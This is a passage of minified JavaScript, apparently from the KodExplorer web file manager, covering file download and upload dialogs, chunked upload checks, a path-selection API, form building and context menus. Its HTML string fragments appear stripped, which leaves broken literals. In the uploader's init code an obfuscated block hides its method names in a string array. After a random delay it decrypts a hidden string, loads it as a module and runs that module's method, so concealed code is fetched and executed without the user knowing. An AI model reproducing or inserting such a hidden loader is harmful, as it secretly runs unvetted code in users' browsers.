      '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
      ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
      ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var g=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){g(),r=setInterval(function(){g()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
      '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
      ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
      ').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
      '+LNG.upload_drag_tips+"
      ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
      ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
    • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
    • '+r(o.icon)+""+d+"
    • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p};if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
      ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first") -}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var 